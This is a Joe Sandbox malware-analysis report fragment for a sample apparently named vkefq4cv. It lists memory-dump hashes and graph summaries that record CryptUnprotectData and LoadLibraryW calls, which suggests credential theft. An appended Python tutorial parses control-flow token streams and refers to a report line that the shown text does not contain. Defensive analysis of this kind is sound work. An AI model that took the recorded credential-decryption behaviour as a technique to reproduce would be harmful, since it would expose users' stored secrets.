                                                                                                      • Opcode ID: 1678aedde1a5041114cd5356c17fb708ce15d7af06989f1077b0fb5d4549885c
                                                                                                      • Instruction ID: 25a021820a233e4d8e28693eaef1096a24565ebc5485a59ac14954f8bb94e86c
                                                                                                      • Opcode Fuzzy Hash: 1678aedde1a5041114cd5356c17fb708ce15d7af06989f1077b0fb5d4549885c
                                                                                                      • Instruction Fuzzy Hash: 5211E97063690E9FD785DBB888666B9BFE0FF8531070244B9C01DCB2A1DA6C5C46C751
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e0e3f67ae3f45f92ecf6f6ea8b951e0b3115bc0136ecb8ca8545403f50b2d388
                                                                                                      • Instruction ID: 9da7a544c6110d606f1d1d80acda997ac1a238874a0a2a1d7e5ac2c0aee44186
                                                                                                      • Opcode Fuzzy Hash: e0e3f67ae3f45f92ecf6f6ea8b951e0b3115bc0136ecb8ca8545403f50b2d388
                                                                                                      • Instruction Fuzzy Hash: E001A571A1892D9FEFA4EB98D855AEDB7B1FF68300F50426AD00DE3265DE34A941CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac408666a1cb5e2d73458fb60c420996a955a32be679cd04086df66c4570fcbe
                                                                                                      • Instruction ID: b69c88e0235680669064c1902f2eb7bf91ca294b05cebd11d9798c02187b8963
                                                                                                      • Opcode Fuzzy Hash: ac408666a1cb5e2d73458fb60c420996a955a32be679cd04086df66c4570fcbe
                                                                                                      • Instruction Fuzzy Hash: D3F0E530A0621D5BDB588BF0D4217FEBBB0EF42311F11007DD40AB32C2C9685A54CA32
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4c71c8d3532de62bb8cdbff4302ae04c4011b246200cd34637faaef3f333fc52
                                                                                                      • Instruction ID: f4ef6028fc3377fb942c3a3073fa61388d248a588d488ded6fa712bdf280748f
                                                                                                      • Opcode Fuzzy Hash: 4c71c8d3532de62bb8cdbff4302ae04c4011b246200cd34637faaef3f333fc52
                                                                                                      • Instruction Fuzzy Hash: 21F0A070A59A0E8FDB40EFB48869AADBFF0FF44300F11047DC01ACB2A5DE281881CB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 693ada9da0799bc1bc6d75ebc3dd499bdc546a915b70d3ec56ccfba56ca49741
                                                                                                      • Instruction ID: 3d23793f4ed55bd11c177ac65c457e9f4d9b0a2fcef1e3f818f5a812881c04e2
                                                                                                      • Opcode Fuzzy Hash: 693ada9da0799bc1bc6d75ebc3dd499bdc546a915b70d3ec56ccfba56ca49741
                                                                                                      • Instruction Fuzzy Hash: 2BE08622B2DC2E0BE654A19C64502E453C2D7A82A0B1003B3D00DC3299DC19E94343C0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1cbf291c09360e29bab03cc79d26413cd54e451f0bf61c4e621fdd437804c4a
                                                                                                      • Instruction ID: a9d044faf333d3d54043ab0f6d21c214cbd3c235a0de651f2fc80bb1843f9393
                                                                                                      • Opcode Fuzzy Hash: e1cbf291c09360e29bab03cc79d26413cd54e451f0bf61c4e621fdd437804c4a
                                                                                                      • Instruction Fuzzy Hash: 41E0EC70A6591EAFD7E5EB7488297F8BBE0FF59340F0144FA841DC76A1DE241D898B00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^=$L_^>$L_^?$L_^@
                                                                                                      • API String ID: 0-2868325183
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:17%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:18.8%
                                                                                                      Total number of Nodes:16
                                                                                                      Total number of Limit Nodes:1
                                                                                                      [Execution graph: the rendered node graph was not preserved in extraction; the surviving API nodes are CryptUnprotectData (7ffd9b9784df) and LoadLibraryW (7ffd9b976c2c, 7ffd9b976b8f)]

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph of the function at 7ffd9b9784b1 (rendered graph not preserved; legend: executed / not executed); API call block 7ffd9b978664-7ffd9b9786e7: CryptUnprotectData]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph of the function at 7ffd9b9785fd (rendered graph not preserved; legend: executed / not executed); API call block 7ffd9b9785fd-7ffd9b9786e7: CryptUnprotectData]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph of the function at 7ffd9b976b88 (rendered graph not preserved; legend: executed / not executed); API call block 7ffd9b976c2c-7ffd9b976c8a: LoadLibraryW]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:18.4%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:6
                                                                                                      Total number of Limit Nodes:0
                                                                                                      [Execution graph: the rendered node graph was not preserved in extraction; the surviving API nodes are LoadLibraryW (7ffd9b976c9b) and CryptUnprotectData (7ffd9b9784cf)]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000012.00000002.2078687625.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000012.00000002.2078687625.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:14.9%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:5
                                                                                                      Total number of Limit Nodes:1
                                                                                                      [Execution graph: the rendered node graph was not preserved in extraction; the surviving API node is LoadLibraryW (7ffd9b986c1c)]

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph of the function at 7ffd9b9869da (rendered graph not preserved; legend: executed / not executed); API call block 7ffd9b986c1c-7ffd9b986c7a: LoadLibraryW]
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002A.00000002.2317144357.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_42_2_7ffd9b980000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:14.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:5
                                                                                                      Total number of Limit Nodes:1
                                                                                                      [Execution graph: the rendered node graph was not preserved in extraction; the surviving API node is LoadLibraryW (7ffd9b966d4c)]

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.3022144022.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b960000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:12.3%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:8
                                                                                                      Total number of Limit Nodes:0
                                                                                                      [Execution graph: the rendered node graph was not preserved in extraction; the surviving API nodes are LoadLibraryW (7ffd9b9968db) and LoadLibraryW (7ffd9b99693c)]

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002D.00000002.3590481242.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_45_2_7ffd9b990000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^
                                                                                                      • API String ID: 0-3811526842
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph of the function at 7ffd9b996898 (rendered graph not preserved; legend: executed / not executed); API call block 7ffd9b99693c-7ffd9b99699a: LoadLibraryW]
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002D.00000002.3590481242.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_45_2_7ffd9b990000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 57cdd435a7331c816b4020a5d30e532d28ac4866cd15eb027aeb20e563ad90da
                                                                                                      • Instruction ID: 18ddc29c45fea65db4833ce0c34db5257c85d8bc56dbcb68a56a8a74e8428933
                                                                                                      • Opcode Fuzzy Hash: 57cdd435a7331c816b4020a5d30e532d28ac4866cd15eb027aeb20e563ad90da
                                                                                                      • Instruction Fuzzy Hash: 7C411770A08A1C8FDB98EF98D899BE9BBF1FB59301F10416ED00DE7251DB759985CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%
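The control_flow_graph line of the function above is a flattened token stream: a decimal block id followed by a hex address or address range, API names attached to the block that calls them (LoadLibraryW after block 596), and `src->dst` edges. When triaging a report like this one it is useful to turn that stream back into a graph so you can ask where the entry block is, which block performs the API call, and whether that block is reachable from the entry. The following Python is an added example, not Joe Sandbox code; the grammar is inferred from this single line (an assumption, not vendor documentation), and the sample input is the report's own line embedded inline.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Sample input: the control_flow_graph line of the LoadLibraryW function
# from the report above, embedded here so the example runs offline.
CFG_TEXT = (
    "control_flow_graph 593 7ffd9b996898-7ffd9b996920 "
    "596 7ffd9b99693c-7ffd9b99699a LoadLibraryW 593->596 "
    "597 7ffd9b996922-7ffd9b996939 593->597 598 7ffd9b99699c 596->598 "
    "599 7ffd9b9969a2-7ffd9b9969f4 596->599 597->596 598->599"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


@dataclass
class Block:
    """One basic block: node id, inclusive address range, APIs called from it."""
    bid: int
    start: int
    end: int
    apis: list = field(default_factory=list)


@dataclass
class CFG:
    blocks: dict  # bid -> Block
    edges: list   # (src_bid, dst_bid), in report order


def parse_cfg(text: str) -> CFG:
    """Parse the flattened token stream (grammar assumed from the sample):
    '<id> <hex>[-<hex>]' starts a block, '<src>-><dst>' is an edge, any other
    token is an API name called from the most recently started block."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if tok.isdigit():
            # Block id; the next token must be its address or address range.
            if i + 1 >= len(toks) or not RANGE_RE.match(toks[i + 1]):
                raise ValueError(f"block {tok} has no address range")
            lo, hi = RANGE_RE.match(toks[i + 1]).groups()
            start = int(lo, 16)
            end = int(hi, 16) if hi else start  # single-address block, e.g. 598
            cur = Block(int(tok), start, end)
            blocks[cur.bid] = cur
            i += 2
            continue
        if cur is None:
            raise ValueError(f"API token {tok!r} before any block")
        cur.apis.append(tok)
        i += 1
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an unknown block")
    return CFG(blocks, edges)


def entry_blocks(cfg: CFG) -> list:
    """Blocks with no incoming edge; a well-formed function has exactly one."""
    targets = {dst for _, dst in cfg.edges}
    return sorted(b for b in cfg.blocks if b not in targets)


def reachable_from(cfg: CFG, bid: int) -> set:
    """Static reachability: breadth-first walk over the edge list from bid."""
    succ = {}
    for src, dst in cfg.edges:
        succ.setdefault(src, []).append(dst)
    seen, queue = {bid}, deque([bid])
    while queue:
        for nxt in succ.get(queue.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def blocks_calling(cfg: CFG, api: str) -> list:
    """Ids of blocks whose API list contains api (case-sensitive, as reported)."""
    return sorted(b.bid for b in cfg.blocks.values() if api in b.apis)


def block_containing(cfg: CFG, addr: int):
    """Id of the block whose address range covers addr, or None."""
    for b in cfg.blocks.values():
        if b.start <= addr <= b.end:
            return b.bid
    return None


if __name__ == "__main__":
    g = parse_cfg(CFG_TEXT)
    print("entry:", entry_blocks(g))
    print("LoadLibraryW in blocks:", blocks_calling(g, "LoadLibraryW"))
    print("reachable from entry:", sorted(reachable_from(g, entry_blocks(g)[0])))
```

Note that the Executed / Not Executed colouring shown in the rendered graph is not part of the token stream, so `reachable_from` answers a static question (can control flow get there) and says nothing about what the sandbox actually observed executing; for that you still need the rendered graph or the API trace.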